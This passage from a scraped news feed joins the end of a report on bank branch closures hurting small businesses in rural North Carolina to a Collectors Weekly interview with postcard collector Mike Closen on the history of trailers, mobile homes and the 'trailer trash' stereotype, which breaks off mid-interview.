Weak school systems have made many rural communities less attractive to employers, says Peter Skillern, executive director of Reinvestment Partners, a nonprofit based in Durham, N.C., that works with rural communities.

Dollar stores and big-box retailers drained customers from some local shops. The financial crisis left some residents with battered credit and collateral. Populations dropped as youth moved out.

These communities have been hurt by declines in the textile and furniture industries, consolidation in agriculture and decreased government support for tobacco. Average annual employment in North Carolina’s 80 rural counties fell 6% between 2007 and 2016, according to the Raleigh-based NC Rural Center, compared with a gain of 11% in its six urban counties.

“It would be great if there were branches and people in all these rural communities,” says Kel Landis, former CEO of RBC Centura, which once owned the rural North Carolina bank locations purchased by PNC in 2012. “But I do understand, as a former banker, the economics. If you have a place that used to be thriving, but the downtown has closed up, having a branch there is a money-losing proposition.”

Another headache for bankers in rural areas, says Jerry Rexroad, CEO of Carolina Financial Corp., is that “it’s very hard to find highly competent commercial loan officers who want to live in these small towns and can produce an adequate amount of production.” He said rural businesses often have less sophisticated reporting systems that make their finances tougher to analyze.

Carolina Financial, of Charleston, S.C., in November acquired First South Bank, of Washington, N.C. “The smaller towns are really more for deposit-gathering that gives you funds to lend to larger towns,” says Nick Nicholson, chief credit officer First South Bank.

Carolina Financial’s Mr. Rexroad says it is “equally committed to growing our market share in rural and urban markets,” and recently assigned senior loan officers to help cover rural areas.

Small-town businesses say bank pullbacks weaken local economies further.

PNC installed an ATM 6 miles from Woodland in Rich Square, population 884, when it closed its branch there in 2016, leaving the area without a bank branch for the first time since 1902 (see related article).

“It’s hard to get a business to come in” when there is no bank to cash workers’ paychecks, says Rich Square Town Commissioner Reginald White. Rich Square has a barber shop, grocery, hardware store, pharmacy, post office and three restaurants. But the storefronts on one side of Main Street are vacant.

Horace Robinson, owner of Upper Cutz Barber Shop on Main Street, makes weekly deposits at the ATM. When he needs change, he unlocks his soda machine or one of the shop’s arcade games rather than drive to a PNC branch 17 miles away.

A PNC spokeswoman says the bank, “continuously evaluates its branch network to assure we are meeting customer needs in a cost effective way.” Customers, she says, “are banking very differently today” with online and mobile channels and ATMs.

After deciding to close the Rich Square branch, PNC “contacted 15 banks, in some cases multiple times,” in an unsuccessful effort to find another financial institution to take it over, she says. PNC donated the branch to the community, installed a full-service ATM and made other investments, she says.

Ms. Baker, the peanut-business owner, says 45 years ago, when her mother moved her ceramics classes from home to a storefront, a local banker took a personal interest in the business and gave her a loan.

In Ms. Baker’s 15,000-square-foot operation, workers make peanut brittle and water-blanch and fry peanuts, then season them or cover them in chocolate. It employs up to 18 during peak season.

When she sought a loan to expand into a new building, she figured the family’s decades-old relationship with Southern would help get her one. Instead, she says, a banker at Southern “told me I should close the business down” or operate it just during the busy Christmas season. PNC, she says, told her there wasn’t enough foot traffic to support a store.

She received a loan from Carolina Small Business, a nonprofit lender a two-hours’ drive away in Raleigh. It offers financing, education and training to small businesses but doesn’t collect deposits or offer checking accounts, wire transfers and other traditional banking services.

Because it takes so long to get to the closest PNC branch, where she does her business, Ms. Baker sometimes makes deposits at a Southern branch about 8 miles down the road. Doing business with two banks, “you end up having double fees.”

Simple transactions require more planning. Employees must leave earlier to cash their paychecks, says Ms. Baker, who plans to add automatic deposit next year. When the peanut business runs out of change, Ms. Baker and employees go through their pocketbooks.

Moving to a town with more foot traffic might have made sense, but her business “was like that last thing in our town,” she says, and “I didn’t want to take it away.”

Write to Ruth Simon at ruth.simon@wsj.com and Coulter Jones at Coulter.Jones@wsj.com

Home in a Can: When Trailers Offered a Compact Version of the American Dream

$
0
0

Mobile homes have a bad rap. The minute you utter the words, “trailer park,” many people will come back with stereotypes about “trailer trash,” or slovenly, ignorant, beer-swilling yokels who leave busted appliances and inoperable cars outside their mobile homes. The “trailer trash” caricature has been all over pop culture the past few decades—from Cousin Eddie in the “Vacation” movie series to Jeff Foxworthy’s redneck comedy to “The Trailer Park Boys” TV and movie series. And the animosity toward the poorest and least educated trailer-dwellers has recently taken on a political dimension, as it’s often incorrectly assumed that everyone who lives in a mobile home must have voted for Donald Trump.

“You can’t get away from the trailer-trash concept, because much of it is self-inflicted by the industry.”

Oddly, cramped living quarters are making a comeback, under the guise of artisanal “tiny houses”—many of which resemble a wheeled trailer dressed up like a log cabin. Sold as a more sustainable way of living, tiny houses are considered stylishly rustic and telegraph a sense of moralistic simplicity that’s popular with the educated elite. But in place like San Francisco, where the land is often more valuable than the buildings that sit on it, where the heck do you park a tiny house … in a trailer park?

While tiny houses have dodged the “trailer trash” stigma, many types of shelters get lumped into that stereotype: Camping or travel trailers are shelters meant to be pulled to campsites by an automobile. Recreational vehicles (RVs) have the living quarters built into the auto itself, and are mostly used for camping. Mobile homes, like travel trailers, are meant to be pulled to a location by a truck, but they often stay in one spot for decades. Today, mobile homes have morphed into wheelless “manufactured homes,” which are delivered to trailer parks via flatbed trucks. In time, mobile and manufactured homes have grown to be as large as regular “stick-built” homes, taking up two or three lanes on the highway, a size that would be downright extravagant to a disciple of tiny-house minimalism.

Top: "Life in a Trailer Park in Florida" involved flower beds and socializing, according to this 1950s Tichnor linen postcard. Above: A 1960s advertising postcard promotes a two-bedroom trailer in the "Mobile Home Section" of Orange Blossom Hills, Florida. (Images via eBay)

Top: “Life in a Trailer Park in Florida” involved flower beds and socializing, according to this 1950s Tichnor linen postcard. Above: A 1960s advertising postcard promotes a two-bedroom trailer in the “Mobile Home Section” of Orange Blossom Hills, Florida. (Images via eBay)

Mike Closen and John Brunkowski—who split their time between Maine and Florida—think the classist shaming of trailer-park living needs to end. Even though they’ve never lived in a mobile home full-time, the couple have been avid RV campers for the past three decades, and they’ve bought mobile homes for their parents. Their obsession with camping, RVs, and mobile homes has given them quite the collecting bug. They have accumulated more than 20,000 trailer-related postcards, as well as several thousand other objects, including RV, trailer, and mobile-home toys and models; advertising pinbacks; matchbook covers; cups; magazine ads and articles; books; clothing patches; and emblems from the coaches themselves. Together, they’ve published seven books on the topic, including one focused on Kampgrounds of America, one exclusively about Airstream collectibles, and their latest, Don’t Call Them Trailer Trash: The Illustrated Mobile Home Story, published by Schiffer, which is about their collection as a whole. Through their objects, you can see the trajectory of mobile-living from horse-drawn carriages to sleek (and still beloved) metallic Airstream trailers to mobile-home parks as a surprisingly posh alternative to 1950s suburbia, where you get the white-picket-fence dream at a discount and everyone in the neighborhood goes swimming and square dancing together. I spoke with Mike Closen over the phone and he told me the true mobile-home history that, so often, gets overshadowed by the stereotypes.

Collectors Weekly: When you talk about trailers, that encompasses both campers and mobile homes, right?

Closen: Yes, and you’re hitting on one of the issues that we’ve confronted with all seven of our book about RVs, campers, and mobile homes. There’s no bright line between a travel trailer and a mobile home. Some of the shortest trailers in the world, 10- to 15-foot-long trailers, are put in one spot and never leave it, and people manage somehow to reside in that. So it becomes a fixed-place home, even though it’s very short. On the other hand, there are some very long trailers that go on the road all the time.

Lucille Ball and Desi Arnaz's 1953 comedy, "The Long, Long Trailer" boosted mobile-home and travel-trailer sales in the 1950s.

Lucille Ball and Desi Arnaz’s 1953 comedy, “The Long, Long Trailer” boosted mobile-home and travel-trailer sales in the 1950s.

Lucille Ball and Desi Arnaz made that point in their famous 1953 movie “The Long, Long Trailer,” which inspired a lot of Americans to consider living in mobile homes. Although Lucy and Desi poked fun at the RV lifestyle in the movie, audiences were impressed with the magnificent, upscale trailer they drove across the country. It had a bathroom with an early, primitive trailer shower. The film was so popular that a couple of manufacturers hired Lucy and Desi to advertise their mobile homes. We have a copy of that movie in each of our homes, in Maine, in Florida, and in our RV. I’ll bet John and I have watched the movie at least 40 times over the years; we can quote lines from it.

Collectors Weekly: Do mobile homes always have wheels?

Closen: Yes, though that doesn’t distinguish what a mobile home is and isn’t anymore. Certainly, a mobile home—just as with a manufactured home—has to be moved down the highway to get it from the factory to its final location. Whether the wheels are left on or not, it’s still a mobile home. In a lot of states, wheels determined whether you had to have a license plate on the vehicle. It also affected whether the unit became part of the real estate versus whether it continued to be personal property sitting on top of the land.

Vagabond's metal emblem for its mobile homes and travel trailer, circa 1940s-'50s, depicts a hobo with a bindle. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

Vagabond’s metal emblem for its mobile homes and travel trailer, circa 1940s-’50s, depicts a hobo with a bindle. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: I noticed you have a lot of trailer-trash gags in your book. Do you enjoy that kind of humor?

Closen: Well, it’s out there, and it can’t be avoided. For this book, we decided that each chapter would begin with items perpetuating the trailer-trash myth, like the Jeff Foxworthy book, Redneck Extreme Mobile Home Makeover. After we draw you in, we attempt, in our lighthearted way, to reverse that notion. But when collecting trailer memorabilia, you can’t get away from the trailer-trash concept, because much of it is self-inflicted by the industry. For example, in the early days of trailers, Vagabond produced upscale, high-quality travel trailers and small mobile homes—and yet the Vagabond emblem affixed to the sides of their trailers featured a hobo with a bindle over his shoulder. Some of their trailers were even equipped with lamps or salt-and-pepper shakers shaped like a hobo with a bindle. Other companies put out all sorts of advertising with bawdy images of scantily clad women, including promotional playing cards and other memorabilia. Some of the stereotypes can be attributed to the industry execs, who should’ve been more aware of what they were doing.

The trailer-trash myth took off after World War II, when soldiers coming back from the war were faced with a housing shortage. Much of the travel-trailer and mobile-home industry got its jumpstart at that time. Confronting the housing situation, a lot of returning servicemen chose to move into RVs and mobile homes, at least for the short-term. It’s unfortunate that our veterans were also then associated with this notion of being “trailer trash.” In the ’40s, people living in “regular” homes also looked upon those in RVs and mobile homes as “trailer trash” because they had to go to the outhouse or the campground wash facilities just to use the toilet. We have hundreds of postcards in our trailer-themed collection just about outhouses.

A linen comic postcard, circa 1940, shows a man rushing to an outhouse from his trailer. (Via eBay)

A linen comic postcard, circa 1940, shows a man rushing to an outhouse from his trailer. (Via eBay)

Collectors Weekly: What were the predecessors to mobile-home living?

Closen: We’ve been looking at mobile-home culture for a long time, and we’ve traced the mobile lifestyle in the United States back to Native Americans. Historically, they haven’t been credited with contributing to the development of the RV and mobile-home industry. It was the settlers moving across the country in their covered wagons that are credited with having the first mobile homes—and that doesn’t surprise me. If we really want to be serious about history, we need to credit nomadic tribes for devising ways to move their homes behind their horses and carry their tepees. They were doing it long before the pioneers were moving across the country in their more luxurious Conestoga wagons.

In general, settled people tend to look down on “nomads.” But with the expansion of the country from east to west after the Louisiana Purchase in 1803, the settlers living in a horse-drawn trailer or wagon were seen as heroic, confronting their fears of the unknown, including their fears of the Native American tribes living in the West. In the United States, the pioneers put a positive spin on the notion of being a nomad.

This tourist postcard labeled "Montana Sheepwagon, Sheepherder's Mobile Home" shows an early wagon with a house-sized door. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This tourist postcard labeled “Montana Sheepwagon, Sheepherder’s Mobile Home” shows an early wagon with a house-sized door. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Once homesteaders established farms and ranches, they hired cowboys to rustle cattle on the open range and farmhands to till the soil on fields far from the main house. These workers relied on horse-drawn wagons when they were miles away from a town or the central farm, and those wagons served as cooking facilities and bunk houses.

In the 19th century, you had all sorts of outcasts wandering the country by train or horse-drawn wagons. Salesmen, as well as circus and carnival people and performing minstrels, traveled from city to city or area to area to earn their livelihoods. Reform Christians found wagons useful, too; they toured the country hosting big-tent revivals and converting new believers.

An undated postcard shows "gipsies", or Romani nomads, outside their horse carriages. (Via eBay)

An undated postcard shows “gipsies,” or Romani nomads, outside their horse carriages. (Via eBay)

Collectors Weekly: In Europe and some parts of America, the nomadic lifestyle is also associated with the Romani people (disparagingly referred to as “gypsies”) and their horse-drawn carriages.

Closen: Yes. That wandering-gypsy stereotype, along with that of the train-hopping hobo, was associated with mobile homes for decades. In our collection, we have a mocking late-1930s “New Yorker” cartoon depicting a couple in gypsy clothes attending a New York City car-and-trailer show. Yet, in the early years, a number of campgrounds and manufacturers used romanticized images of gypsies to help sell their RVs.

Collectors Weekly: In the book, you show the bathing machines that the modest turn-of-the-century Europeans used. Did they also influence trailer design?

Closen: The bathing machines were towable dressing rooms used by beach-goers for a very brief period of time. By including them in the book, John and I were simply pointing out some of the shelters in the long line that eventually led to upscale travel trailers and mobile homes. People could sit or relax in their dressing rooms. They could change in and out of their swimwear. They would leave their possessions in them, and then go outside and swim or sit at the beach. Covered-wagon living was just an extended form of that: You kept your clothes, food, and belongings in the wagon. But you cooked outside, and you didn’t eat inside the wagon unless the weather was inclement.

Beach bathing huts, or "L'Heure du Bain," were popular at the beach in Boulogne-sur-Mer in Northern France. (Via eBay)

Bathing machines were popular for “L’Heure du Bain” (“The Hour of the Bath”) at the beach in Boulogne-sur-Mer in Northern France in the early 1900s. (Via eBay)

Collectors Weekly: How did trailer camping evolve into a form of vacation in North America?

Closen: In the late 19th century, we started having campgrounds and campsites in the U.S. and Canada, and tent campers were often delivered to the site via train. The wealthiest people in Canada and England continued to go on extended tours of the countryside by rail up until the late 1930s and early ’40s. Instead of using a travel trailer or tent, they would hire an entire lavishly appointed train car, and they brought their servants to attend to them. Their train car would be towed along, and then placed on a railroad siding for a period of time so the tourists could see the sights. Then the car would be picked up by another train and towed to the next location for a sizable sum of money. It was, again, a sort of mobile home. At least temporarily, these rich folk were living out of a train car.

What car camping looked like in the 1920s.

When automobiles were first mass-produced in the United States around 1900, Americans who could afford vehicles began auto camping. You used your car as part of the camper. People would drive their car down the road, stop somewhere remote on the roadside, and then set up a tent-like contraption. Sometimes they attached a canvas sheet to the top of the car and then propped the other side up with poles. Sometimes they’d park two cars next to one another and stretch a canvas between the tops of the cars.

On the very earliest truck chassis, people would build shelters that had fold-out devices similar to today’s slide-outs that could be covered in tent canvas. By the 1920s, Americans were making their own trailers they could attach to the back of their cars and tow. These early trailers tended to be very short because you didn’t have a very powerful vehicle to pull it. They were rickety contraptions, built of every conceivable material, mostly wood and the sort of canvas that would have been used on a covered wagon.

This 1922 mobile home was hand-built on a truck chassis. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This 1922 mobile home was hand-built on a truck chassis. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Where did the campers go?

Closen: They’d show up in established parks or pull over to the side of the road and camp on empty-seeming farmland, although certainly they were trespassing on private property. By the 1920s, a lot of municipalities figured out that all these people traveling along the roadways needed a place to go. Several thousand parks or camps sprang up along the highways of America. Those would’ve had primitive outhouse facilities, but not much more than that. With each passing year and decade, those facilities expanded and improved. Almost immediately, as building trailers to camp and reside in caught on, there was an instant parallel growth and development of places for them to go. They were called tourist parks, trailer parks, tourist camps, and fish camps—which, by the way, didn’t help. That was more of the trailer-trash stereotype: “Oh, there’s a fish camp down the road where you can stay.”

This unused tourist postcard, circa 1930-'40s, shows a couple at a so-called "fish camp." While fishing and boating were popular vacation activities, trailer parks on the water often had low-quality facilities, garnering them a bad rap. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This unused tourist postcard, circa 1930-’40s, shows a couple at a so-called “fish camp.” While fishing and boating were popular vacation activities, trailer parks on the water often had low-quality facilities, garnering them a bad rap. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Besides camping, what were early trailers used for?

Closen: Earlier trailers also served commercial purposes. We have a photo of a tiny trailer a barber used to travel to little towns and give haircuts in his trailer. I recently found a great old photo of a traveling post office from 1920s Great Britain. The postmen hooked a wagon to a vehicle and drove it to isolated rural areas that otherwise wouldn’t have mail service. One worker sat in the wagon and did the sorting while the other drove.

Collectors Weekly: What were the first manufactured trailers like?

Closen: In the beginning, of course, no factories made these travel trailers. You had to make your own. The next step was that people who first made trailers started selling the instructions to other people who wanted to build their own. Then early entrepreneurs started what they called factories, but they were really workshops that had more than one person building these trailers. Eventually, trailer manufacturers adopted Henry Ford’s assembly line.

The first factory-made travel trailers, the forerunners of the Airstream and the other metal coaches, came along in the early 1930s, using the same material airplane fuselages made of at the time. They had to be built of lightweight metal like aluminum to be towed down the road. Airstream got its start in the 1930s and took off. Today, Airstream is the longest-operating manufacturer of travel trailers in the United States, thanks to their unique design and roadworthiness.

A 1960s Mickey Mouse Club puzzle portrays Mickey and friends vacationing with a "canned ham" style travel trailer. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

A 1960s Mickey Mouse Club puzzle portrays Mickey and friends vacationing with a “canned ham” style travel trailer. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: That’s when you got what they called the “canned ham”?

Closen: Actually, the canned ham was a fairly early design, even before factory-made trailers. Americans made their own trailers in the shape of a canned ham because it was somewhat aerodynamic, but more importantly, the highest point in the trailer was in the center, where people would stand and need the headroom. At both the front and the back of the trailer, you see a curvature so that there’s less headroom, but that’s where the bed, table, chairs, or storage would be. Certainly, you are absolutely correct that the canned-ham look was a very popular metal factory-made design, as well.

Here’s an interesting footnote: In 1930s Great Britain, the boxy trolley design was more popular than the canned ham. Down the center of the trailer, it had a raised area like a trolley car has because that’s where you needed the headroom. On the sides, there would be beds, cabinets, seating, and so on.

The horse carriage in this missionary postcard, sent in 1904, features the trolley design that was adopted for early British trailers. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

The horse carriage in this missionary postcard, sent in 1904, features the trolley design that was adopted for early British trailers. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Let’s talk about the aftermath of World War II. Before the war, most servicemen had been living with their parents, correct?

Closen: Yes, because of the age of the people who were drafted into the military. My dad was among them. He was at home at that point in life, and then the war came along and interrupted college—even high school for a lot of those folks—because they were on the cusp of adulthood. The U.S. military was mostly made up of young men at that time. When they came back, they were full-fledged adults, ready to move away from living with the family. I know that after I first left home to go off to college, after I had my first taste of freedom, there was no way I was going to live under my parent’s roof again.

Collectors Weekly: After the war, why didn’t the soldiers live in apartments in the cities?

Closen: At that time in history, the larger cities were not structured in such a way where there was enough land or apartment buildings for the returning soldiers. It was before the era of the high-rise condominium, and the towns had been built up at the point so that every inch was occupied by structures. I think the overcrowding at the end of the war was one of the principal reasons for the movement to the suburbs as well as campgrounds and mobile-home parks.

This trailer ad in the March 9, 1946, edition of "Saturday Evening Post" refers to the post-World War II housing shortage. You can see the living quarters in the cutaways has no bathroom. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This trailer ad in the March 9, 1946, edition of “Saturday Evening Post” refers to the post-World War II housing shortage. You can see the living quarters in the cutaways has no bathroom. Click on the image to see a larger version. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Were mobile homes cheaper than cottage houses?

Closen: Oh, yes. From the beginning of trailer manufacturing, makers were savvy enough to build mobile home in various lengths, so that the length affected the cost. You have to remember that in the mid-’40s, the technology wasn’t there to put bathroom facilities in trailers. Even after the technology was developed in the late ’40s, there were still almost no trailers with bathrooms. Vagabond was one of the earliest companies to put a tiny, little toilet in the corner of one of its models. It was in the bedroom, and they had a dresser built over the top of it with a swinging door below. You could swing the door out to find a tiny toilet bowl. That was the extent of the bathroom—no basin, no shower, no nothing.

Collectors Weekly: Did returning soldiers view mobile homes as permanent or temporary dwellings?

Closen: I think most veterans viewed them as temporary housing until they got their feet on the ground and could move on. For one thing, the trailers were not as well-built as they are today, and they wouldn’t have been roadworthy for a long time. (The exception to the rule, of course, were the Airstream trailers. Something like 70 to 75 percent or so of all Airstreams ever made are still roadworthy.) Many millions of people came back from the war before many of the suburban stick-built residences were created. Some of them became permanent residents of trailers.

Collectors Weekly: It almost sounds like those trailer parks were an extension of being in a bunker or on the ship.

Closen: Oh, yeah! On the ship, the men would be living in dormitories with multiple bunks, so at least the trailers were private. A lot of those soldiers came back, got married, and had kids—the Baby Boomers were the product of that. A lot of folks would’ve been created in trailers.

This 1950s Mobile Homes Manufacturers Association ad, which appeared in "Life" magazine, boasts about the "modern" bathroom innovations featured in the latest trailers. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This 1950s Mobile Homes Manufacturers Association ad from “Life” magazine boasts about the “modern” bathroom innovations featured in the latest trailers. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: When did trailers get bathrooms and how did that plumbing work?

Closen: In the early ’50s, the technology for trailer bathrooms developed to the point most manufacturers could include them in mobile homes and RVs, and that’s when the interest in both of those kinds of coaches exploded. Before then, outhouses in campgrounds and mobile-home parks served the people who lived there.

“For people who are social animals, the mobile-home park is a great place to live.”

Mid-century bathroom technology truly was the thing that allowed RVing and mobile homes to flourish. Almost immediately, the campgrounds and mobile-home parks came up to speed by providing the water and sewer utilities that they could hook into. When all of that came together, two multi-billion-dollar industries were born.

With travel trailers, you’d pull into a campground, hook up a hose to a water spigot, another hose to the sewer, and plug in for your electricity. When you’re ready to leave, you’d just unhook everything, go to the next campground, and repeat the process. In a mobile-home park, your mobile-home is effectively the equivalent of a stick-built house, hooked up to the local water, sewage, and electricity systems. In a campground, you pay a flat fee for sitting there, whereas with the mobile home, you get separate utility bills for each service.

A 1952 "Saturday Evening Post" article reads, "If you pity families who raise kids in house trailers—don't. Their dwelling may have cost more than yours, it's just as convenient, and a lot less trouble. Here's how these happy gypsies live." (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

A 1952 “Saturday Evening Post” article reads, “If you pity families who raise kids in house trailers—don’t. Their dwelling may have cost more than yours, it’s just as convenient, and a lot less trouble.” (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Did trailer parks become more fashionable and “suburban” in the early ’50s?

Closen: Yes, and they could be as good or better than suburbs. There were plenty of people who had stick-built homes that were not as nice, as modern, or as well-kept as many mobile homes. That’s why the trailer-trash myth needs to be debunked. It’s too quick a stereotype.

Collectors Weekly: How did the name of a mobile-home park determine its respectability?

Closen: There is a lot of significance in a name. If you call your park the Closen Fish Camp or Trailer Park, it’s going to have a different image than if you call it Northwest Villa, The Estate, Southern Resort, or The Marina. It’s just like curb appeal. Some of these places have been smart enough to call themselves some pretty fancy names, but they are still entry-level communities.

Around the United States, there have been a lot of upscale mobile-home communities. They are gated, pristine, and well maintained. The units in them are high-end mobile-home residences populated with people of wealth and education. Some even have golf courses, fine dining, bars, and swimming pools, like country-club living.

This 1950s advertising postcard for Blue Skies Trailer Village near Palm Springs, California, brags, "It is the concept of Bing Crosby, President. Co-habitues (and landlords) include Humphrey Bogart and Lauren Bacall, Jack Benny, Barbara Stanwyck, Danny Kaye, Greer Garson, George Burns and Gracie Allen, Jose Ferrer and Rosemary Clooney, Claudette Colbert, and many others." (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This 1950s advertising postcard for Blue Skies Trailer Village near Palm Springs, California, brags, “It is the concept of Bing Crosby, President. Co-habitues (and landlords) include Humphrey Bogart and Lauren Bacall, Jack Benny, Barbara Stanwyck, Danny Kaye, Greer Garson, George Burns and Gracie Allen, Jose Ferrer and Rosemary Clooney, Claudette Colbert, and many others.” (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Bing Crosby had his own trailer park?

Closen: In the mid-century, numerous celebrities, from Lawrence Welk to Bing Crosby, had trailer residences. I’ve always thought it stemmed from the fact that when those actors and actresses were on a film site, they used mobile trailer units for their dressing rooms. They had probably become accustomed to their trailer, and then saw a mobile home as perhaps an attractive way to live.

But, in a number of those situations, to be fully honest, those people were investors in premier trailer parks and were undoubtedly being rewarded for their advertising endorsements. Certainly, it was helpful to the owners and developers of mobile-home communities to be able to say, “Oh, Lawrence Welk lives here” or “Bing Crosby lives here.”

This advertising postcard for Geer Mobile Homes in Grand Island, Nebraska, circa 1950s-'60s, shows a Mid-Century Modern style kitchen with the latest appliances. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This advertising postcard for Geer Mobile Homes in Grand Island, Nebraska, circa 1950s-’60s, shows a Mid-Century Modern style kitchen with the latest appliances. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Can you tell me a little bit about how Mid-Century Modern style influenced mobile-home design?

Closen: The Mid-Century Modern look was mostly seen in the interior design, with the colors, furnishings, and wall coverings. Mobile homes need to be boxy, unlike canned ham or Airstream travel trailers. You want the full headspace, so the exterior of mobile-homes was never really influenced by design trends. But the interiors changed with every fad, like the shag carpeting that you and I lived through at one awful, awful time. They can be remodeled as often the stick-built house so people can make their interiors current and fashionable anytime they like.

Collectors Weekly: In the 1950s, when pin-ups were often used for advertising, did this create an association with promiscuous women living in mobile homes?

Closen: Oh, yeah, and that’s largely a fiction. Issues of infidelity can be present anywhere, under any circumstances. Again, part of the stereotype is that low-life, low-quality people live in mobile-home parks.

This 1946 comic linen postcard by Curt Teich Co. of Chicago depicts trailer dwellers as country bumpkins and the social aspect of trailer parks as a threat to marriage. (Via eBay)

This 1946 comic linen postcard by Curt Teich Co. of Chicago depicts trailer dwellers as country bumpkins and the social aspect of trailer parks as a threat to marriage. (Via eBay)

Collectors Weekly: It seems like mobile-home parks had a social aspect that suburban subdivisions lacked.

Closen: For sure. At an RV park, you might have a picnic table and a grill where you can cook out and eat. However, from the earliest days of the mobile-home parks, the notion was that this trailer was going to be your home. You had a bit more space around you, so you could have a white picket fence, a flower bed, and a dog or cat. But since the whole park is a sovereign entity of sorts, there’s a boundary around it, and the people within it are then part of a community. Virtually every park had a community center or a clubhouse, where they held meetings, shared weekly coffee hours, played bingo or shuffleboard, square danced, and hosted potlucks. I think mobile-home living has been far more successful at community-building than life in a high-rise.

As a young professional in a big city, I lived in a number of high-rise buildings, and I didn’t even know my neighbors next door. In some respects, the much maligned mobile-home parks have even better lifestyle opportunities than other housing. We housed my mother and father in a manufactured house here in Florida, which was placed in a mobile-home park with more than 800 coaches. They have a huge clubhouse with a ballroom, a swimming pool, shuffleboard, tennis, and a club for almost every hobby in the world. Some people who consider themselves loners are more happy when they have privacy. But for people who are social animals, the mobile-home park is a great place to live.

A resident of the Homecrest Mobile Home Park would have worn this patch on his or her jacket around the 1950s-'60s. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

A resident of the Homecrest Mobile Home Park would have worn this patch on his or her jacket around the 1950s-’60s. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: In the book, you show mobile-home park membership patches. Would people put them on their clothes and wear them with pride?

Closen: Oh, yes, for sure. In mobile-home and RVing communities, people sewed fabric patches onto their jackets indicating their allegiance to their mobile-home park or their trailer or RV manufacturer, like Winnebago, Airstream Club, or New Moon. Winnebago, for example, has the Winnebago International Travelers, or WIT, which holds regional and national conventions. You would wear the emblem on your jacket or fly a flag from your RV.

Collectors Weekly: How was ham radio connected to trailers?

Closen: Around the world, most amateur radio, or ham radio, operators broadcast from their homes. But people with travel trailers or RVs realized that moving around increased the range of their opportunities to communicate with other amateur radio operators. It was especially popular in the ’60s and ’70s. You’d be sitting there at your radio with your headset talking to somebody in Spain or Russia. People wanted to document this connection in writing, so they would keep log books. They would often send a postcard to the person they spoke to and ask that person to send them a card in return. It didn’t take long before people weren’t sending just plain white or beige postcards. They were putting images on the postcard, called a QSL card, and often it was an image of their RV, trailer, or mobile home.

This QSL card from the 1970s shows a ham-radio antenna on top of a "gypsy" wagon. (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This QSL card from the 1970s shows a ham-radio antenna on top of a “gypsy” wagon. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: I’m from Oklahoma, and I always heard it was a bad idea to be in a trailer during a tornado.

Closen: Or a flood. Water and mobile homes don’t mix. If a stick-built house is in the path of floodwaters, the house might be damaged significantly, but usually it’ll still usually be there. A mobile home, like a car, is a contained unit, and if much water comes along, it’s going to sweep the mobile home away. During tornadoes and storms, mobile homes just are not as structurally sound as stick-built homes.

Collectors Weekly: It’s the downside of being poorer, right—you have to buy a cheaper house and then it’s more likely to fall down?

Closen: Yes, exactly. It almost seems like tornadoes target mobile-home parks. But in reality, what happens is that mobile-home parks simply suffer more damage from those storms. It is a fact of life, but the risky nature of mobile homes is also part of the trailer-trash concept.

Some collectors are drawn to mobile-home license plates, like this 1976 tag from Oklahoma, a state that's famous for its tornado season. (Via eBay)

Some collectors are drawn to mobile-home license plates, like this 1976 tag from Oklahoma, a state that’s famous for its tornado season. (Via eBay)

Collectors Weekly: You mentioned in the book the stereotype of people keeping appliances and spare tires outside their trailers.

Closen: Again, that’s part of the Jeff Foxworthy view of mobile-home living, which we had to acknowledge and deal with. We’ve traveled the country and the world. We’ve been to plenty of areas of the country where there are vehicles on blocks, refrigerators and freezers, and all sorts of things in front of a mobile home. But golly, here in Florida and in Maine, there are stick-built homes where people are doing the same thing. We drive by countless stick-built homes, where if the garage door is open, you can see it’s stacked with boxes, and all sorts of random stuff, while the vehicles are all parked on the driveway outside. The truth is mobile homes are often smaller than stick-built houses and lack enclosed garages. When trailer dwellers run out of room, their things might end up in the front yard.

Douglass Crockwell painted "Trailer Camp Friendships" for a U.S. Brewers Foundation beer ad, which appeared in the April 1953 issue of "Woman's Home Companion." Drinking beer at the trailer park looks like elegant, upper-middle class fun. (Via eBay)

Douglass Crockwell painted “Trailer Camp Friendships” for a U.S. Brewers Foundation beer ad, which appeared in the April 1953 issue of “Woman’s Home Companion.” Drinking beer at the trailer park looks like elegant, upper-middle class fun. (Via eBay)

Collectors Weekly: I guess it’s still acceptable to mock people for being poor or having bad taste.

Closen: Sadly, that’s one of those prejudices people tolerate too easily. It’s unfortunate. Some people are poor and just trying to survive. But plenty of people who are much better off are buying mobile homes, too. Even people who live in mobile homes out of economic necessity should not be burdened with the addition of that stereotype. They’re dealing with enough issues as it is.

Collectors Weekly: Is trailer memorabilia a pretty big collecting field, or are you two kind of it?

